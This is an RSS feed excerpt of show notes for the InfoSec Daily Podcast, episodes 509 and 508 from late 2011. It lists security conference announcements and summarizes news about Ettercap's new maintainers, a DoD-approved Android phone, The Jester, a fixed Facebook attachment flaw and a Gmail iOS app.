		<comments>http://www.isdpodcast.com/episode-509-ettercap-is-back-dodroid-patriot-act%e2%80%99s-10th-year-th3j35t3r-keynote-fb-fix-gmail-ios#comments</comments>
		<pubDate>Wed, 02 Nov 2011 01:30:06 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3054</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 509 for November 1, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester with Special Guests Johnny Bravo and PureHate Announcements: BsidesATL 2011 When: November 4th, 2011 Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg). http://www.securitybsides.com/w/page/44893559/BSidesATL-2011 This year there [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 509 for November 1, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester with Special Guests Johnny Bravo and PureHate</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p><a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011</span></a></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Special Announcement:</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Hack3rcon talk about Easy-Creds, had led to conversations about Kernel issues associated with Etter-cap &amp; SSL Strip. The E-Perm issue which has been fixed.. </span></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ettercap development has been officially taken over by Johnny Bravo, Purehate, Emilio Escobar and Enrique Sanchez</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With about 11,000 downloads a month the project has been thriving considering the fact that it hasn&#39;t been updated since 2005.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. Fixed all the bugs</span><br />
	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. 0.7.4 will be rolled out December 4th, 2011</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Possible changes will be an upgraded cross-platform guy.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Will remain completely open source but sponsored by Accuvant. Additional information can be available at </span><a href="http://sourceforge.net/projects/ettercap/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://sourceforge.net/projects/ettercap/</span></a></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://defensesystems.com/articles/2011/10/28/disa-approves-first-andriod-device-for-dod.aspx"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defensesystems.com/articles/2011/10/28/disa-approves-first-andriod-device-for-dod.aspx</span></a></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Defense Information Systems Agency has certified its first secure mobile device running on the Android operating system.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The </span><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dell Streak 5</span><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> smart phone/small tablet computer is the first handheld device using the Android 2.2 operating system to be certified for use in the Defense Department&#39;s secure but unclassified communications, said John Marinho, director of Dell enterprise mobility solutions.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dell began working with DISA in September 2010 to provide a secure Android platform for DOD, Marinho said, noting the government&rsquo;s growing interest in providing mobile devices to civilian and military personnel. &nbsp;</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DISA began working on </span><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">drafts of the certification</span><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in the summer of 2011.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The approved Streak 5 includes a set of Android application interfaces designed to enhance the security of the device. Besides being able to transmit secure unclassified messages, the device can have its data remotely wiped in the event of loss or theft, Marinho said.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Other features include enhanced password protection such as the ability to lock the device down after multiple unsuccessful password entries. Administrators also can remotely control the peripherals and security policy levels on the device, he said. The government-issue Streak 5 also includes DISA-approved security provided by Good Technology&rsquo;s Mobility Suite.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Although the Streak 5 is no longer available commercially, Dell is supplying it to DOD because the military likes the form factor, Marinho said. However, he added that the same capabilities and service can be delivered to other platforms running on Android.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.aclu.org/blog/national-security/patriot-act-anniversary-week-round"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.aclu.org/blog/national-security/patriot-act-anniversary-week-round</span></a></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip; In the interest of so-called internet security, the administration is floating proposals that would sweep up huge amounts of personal information about innocent Americans, simultaneously violating privacy rights and overwhelming the government&#39;s counterterrorism efforts with too much data. And if that&rsquo;s not scary enough, some are even suggesting that the White House be given the ability to turn off the internet in the case of a &ldquo;cyber emergency.&rdquo; Do you know what that is? No? Neither do I. And, neither, it appears, do many of the legislators working on the issue. Now that&rsquo;s something truly scary, just in time for Halloween&#8230;</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="https://www.infosecisland.com/blogview/17784-Hacktivist-The-Jester-Draws-Crowd-at-Hacker-Halted.html"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.infosecisland.com/blogview/17784-Hacktivist-The-Jester-Draws-Crowd-at-Hacker-Halted.html</span></a></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Notorious anti-jihadi hacker The Jester (th3j35t3r) caused quite the stir at last week&#39;s Hacker Halted Conference in Miami by participating in a live discussion during cyber intelligence expert Jeff Bardin&#39;s Wednesday session.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Jester is known mostly for his repeated denial of service attacks on militant jihadi websites, as well as his attack on the WikiLeaks website in late November of 2010 that forced the organization to shuffle Internet hosting providers.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The presentation was billed as a special keynote session, and during the course of the conference rumors quickly began to spread that the guest presenter would be none other than The Jester himself.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prior to the session, The Jester had alluded to the fact that he may have actually been physically present at the conference, tweeting a picture from Wolfgang Kandek&#39;s keynote address (http://t.co/h0KnIBwV), and by apparently hiding an encrypted message in one of the conference rooms, tweeting </span><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;left a little something under the projector in Alhambra SCADA room. Tweet me a photo of what&#39;s there&quot;&#8230;</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.infoworld.com/d/security/facebook-denies-vulnerability-then-quietly-fixes-it-177719"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/security/facebook-denies-vulnerability-then-quietly-fixes-it-177719</span></a></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook has apparently fixed a vulnerability in its social-networking site after insisting it wasn&#39;t a weakness and didn&#39;t need to be remedied.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nathan Power, who works for the technology consultancy CDW, updated his blog on Tuesday to reflect that the flaw had been fixed. The problem allowed a user to send another user an executable attachment by using Facebook&#39;s &quot;Message&quot; feature.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The sender and the recipient did not have to be confirmed friends. Power, who notified Facebook on Sept. 30, found that Facebook parses part of a POST request to the server to see if the file being sent should be allowed. Usually, executable files are rejected.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But Power found that if he modified the POST request with an extra space after the file name for the attachment, it would go through. If a victim accepted the file, the person would still need to launch it in order for malicious software to be installed.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The danger is that Facebook could be used for so-called spear phishing, or targeted attacks with the intention of loading malware on a victim&#39;s machine. The style of attack has been successful against companies such as RSA, which leaked information related to its SecurID authentication and disclosed the issue in March.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At least one defense contractor was subsequently attacked following the RSA breach.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook&#39;s security manager, Ryan McGeehan, said in a statement last week that a successful attack using the vulnerability would require social engineering and also would only allow the attacker to send an obfuscated renamed file to another user one at a time. Facebook this week continued to insist that a fix was not necessary.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span>&nbsp;<a href="http://news.cnet.com/8301-1023_3-20128329-93/gmail-app-for-ios-getting-closer-report-says"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-1023_3-20128329-93/gmail-app-for-ios-getting-closer-report-says</span></a></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google is readying a dedicated Gmail app for Apple&#39;s iOS, says TechCrunch columnist MG Siegler.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Separately, Google formally announced a new look for its Web-based Gmail service, one that introduces the spare look of other Google applications, a revamped search function and improved &quot;density&quot; of the tool&#39;s layout.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Citing &quot;multiple sources,&quot; Siegler revealed the Gmail iOS app effort on his Parislemon tech blog yesterday. The sources say that the app has already been submitted to Apple for review and should be out soon, assuming it gets approved, which Siegler sees as likely.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If true, it would mean that iOS users would join their Android counterparts in gaining access to a dedicated Gmail app with some handy bells and whistles.</span></p>
<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As Siegler points out, Google already offers a Gmail Web page for mobile device users. And of course, iOS users can also set Gmail accounts through the Mail, Contacts, and Calendars feature on their devices. But a full app would presumably offer a variety of useful features in one single package.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-509-ettercap-is-back-dodroid-patriot-act%e2%80%99s-10th-year-th3j35t3r-keynote-fb-fix-gmail-ios/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3054/0/infosec-daily-podcast-episode-509.mp3" length="19569202" type="audio/mpeg" />
		<itunes:duration>0:40:43</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 509 for November 1, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester with Special Guests Johnny Bravo and PureHate
Announcements:
BsidesATL 2011
	When: Novemb[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 509 for November 1, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester with Special Guests Johnny Bravo and PureHate
Announcements:
BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info
BSidesDFW 2011
	When: November 5th, 2011
	Where:Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
You don't have a sufficient version of Flash Player to display this animation.
Stories:
Special Announcement:
The Hack3rcon talk about Easy-Creds, had led to conversations about Kernel issues associated with Etter-cap &#38; SSL Strip. The E-Perm issue which has been fixed.. 
Ettercap development has been officially taken over by Johnny Bravo, Purehate, Emilio Escobar and Enrique Sanchez
With about 11,000 downloads a month the project has been thriving considering the fact that it hasn&#39;t been updated since 2005.
1. Fixed all the bugs
	2. 0.7.4 will be rolled out December 4th, 2011
Possible changes will be an upgraded cross-platform guy.
Will remain completely open source but sponsored by Accuvant. Additional information can be available at http://sourceforge.net/projects/ettercap/
Source:http://defensesystems.com/articles/2011/10/28/disa-approves-first-andriod-device-for-dod.aspx
The Defense Information Systems Agency has certified its first secure mobile device running on the Android operating system.
The Dell Streak 5 smart phone/small tablet computer is the first handheld device using the Android 2.2 operating system to be certified for use in the Defense Department&#39;s secure but unclassified communications, said John Marinho, director of Dell enterprise mobility solutions.
	Dell began working with DISA in September 2010 to provide a secure Android platform for DOD, Marinho said, noting the government&#8217;s growing interest in providing mobile devices to civilian and military personnel. &#160;
DISA began working on drafts of the certification in the summer of 2011.
	The approved Streak 5 includes a set of Android application interfaces designed to enhance the security of the device. Besides being able to transmit secure unclassified messages, the device can have its data remotely wiped in the event of loss or theft, Marinho said.
Other features include enhanced password protection such as the ability to lock the device down after multiple unsuccessful password entries. Administrators also can remotely control the peripherals and security policy levels on the device, he said. The government-issue Streak 5 also includes DISA-approved security provided by Good Technology&#8217;s Mobility Suite.
Although the Streak 5 is no longer available commercially, Dell is supplying it to DOD because the military likes the form factor, Marinho said. However, he added that the same capabilities and service can be delivered to other platforms running on Androi[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 508 &#8211; Tracking Ho’s, Site Down?, TerraAM, Poly9 &amp; India Seizures</title>
		<link>http://www.isdpodcast.com/episode-508-tracking-ho%e2%80%99s-site-down-terraam-poly9-india-seizures</link>
		<comments>http://www.isdpodcast.com/episode-508-tracking-ho%e2%80%99s-site-down-terraam-poly9-india-seizures#comments</comments>
		<pubDate>Tue, 01 Nov 2011 00:51:05 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3050</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 508 for October 31, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma. Announcements: BsidesATL 2011 When: November 4th, 2011 Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg). http://www.securitybsides.com/w/page/44893559/BSidesATL-2011 This year there will be 3 tracks, [...]]]></description>
			<content:encoded><![CDATA[<p>
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 508 for October 31, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
